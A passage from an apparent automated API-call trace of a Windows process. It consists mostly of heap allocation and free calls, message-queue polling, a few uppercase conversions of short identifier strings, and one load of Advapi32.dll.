hHeap=0x25c0000) returned 1 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0251.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0251.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.591] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.592] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.592] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.592] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.593] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0251.593] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.593] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.593] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.594] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.594] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0251.594] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0251.596] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0251.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.597] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.598] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0251.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.598] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.598] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0251.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0251.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.599] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.600] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0251.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0251.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0251.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0251.601] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0251.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.602] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0251.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0251.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0251.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0251.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0251.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | 